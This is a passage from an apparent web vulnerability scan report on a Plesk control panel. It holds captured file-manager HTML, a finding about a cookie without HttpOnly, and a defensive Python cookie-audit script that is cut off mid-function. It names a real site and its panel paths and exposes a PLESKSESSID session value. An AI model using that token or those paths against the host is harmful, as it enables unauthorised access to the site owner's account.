href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var 
inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_anon_ftp" value="anon_ftp" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();">anon_ftp</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=anon_ftp" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fanon_ftp" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" 
class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_cgi-bin" value="cgi-bin" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=cgi-bin" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fcgi-bin" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_error_docs" 
value="error_docs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();">error_docs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=error_docs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Ferror_docs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpdocs" value="httpdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A 
href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpsdocs" value="httpsdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();" 
onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();">httpsdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpsdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpsdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_private" value="private" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" 
width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();">private</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=private" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fprivate" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_statistics" value="statistics" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();">statistics</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=statistics" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fstatistics" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_subdomains" value="subdomains" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" 
onClick=";lon();">subdomains</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=subdomains" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fsubdomains" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_vault_scripts" value="vault_scripts" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();">vault_scripts</a></td><td class="number">&nbsp;</td><td 
class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=vault_scripts" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fvault_scripts" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_web_users" value="web_users" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();">web_users</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" 
width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=web_users" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fweb_users" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_.Security" value=".Security" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=.Security" onClick="return bin();;lon();">.Security</a></td><td class="number">24.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=.Security" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2F.Security" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=.Security" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/rename/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.27. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: psaContext=dashboard; path=/ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
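The scanner text above asks the reader to review the cookies themselves. The script below is an added example, not part of the XSS.CX report and not Plesk code: it parses the Set-Cookie header quoted in the response for the HttpOnly and Secure flags, and decodes the filelist cookie carried in the request, whose value is base64 over a PHP serialize() array (the same value the page body sets with SetCookie("filelist", ...)). The header strings are copied from the request and response on this page; the session-name pattern is a heuristic of this example, nothing else is assumed.

```python
"""Cookie review for the Plesk file-manager finding (added example, not report code)."""
import base64
import re

# Copied from the captured response above (only the headers the audit needs).
RESPONSE_HEADERS = [
    "Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate",
    "Set-Cookie: psaContext=dashboard; path=/",
    "X-Powered-By: ASP.NET",
]

# Copied from the captured request's Cookie header above.
REQUEST_COOKIE_HEADER = (
    "PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; "
    "locale=en-US; psaContext=dashboard; "
    "filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVy"
    "IjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;"
)

# Heuristic (assumption of this example): names that usually carry a session id.
SESSION_NAME_HINT = re.compile(r"sess|sid|token|auth", re.I)


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=val' into name, value and lower-cased attrs."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookies(headers):
    """Flag every server-issued cookie that lacks HttpOnly or Secure."""
    findings = []
    for line in headers:
        key, _, value = line.partition(":")
        if key.strip().lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(value)
        findings.append({
            "name": cookie["name"],
            "missing": [f for f in ("httponly", "secure") if f not in cookie["attrs"]],
            "looks_like_session": bool(SESSION_NAME_HINT.search(cookie["name"])),
        })
    return findings


def parse_request_cookies(header_value):
    """Turn a request Cookie header into a {name: value} dict."""
    cookies = {}
    for item in header_value.split(";"):
        item = item.strip()
        if item:
            name, _, value = item.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


def php_unserialize_flat(data):
    """Decode a flat PHP serialize() array of s:/i: scalars; nested types are rejected."""
    pos = 0

    def read_scalar():
        nonlocal pos
        kind = data[pos]
        if kind == "i":                       # i:<int>;
            end = data.index(";", pos)
            value = int(data[pos + 2:end])
            pos = end + 1
            return value
        if kind == "s":                       # s:<len>:"<bytes>";
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            value = data[start:start + length]
            pos = start + length + 2
            return value
        raise ValueError("unsupported serialized type %r at offset %d" % (kind, pos))

    if not data.startswith("a:"):
        raise ValueError("not a serialized array")
    colon = data.index(":", 2)
    count = int(data[2:colon])
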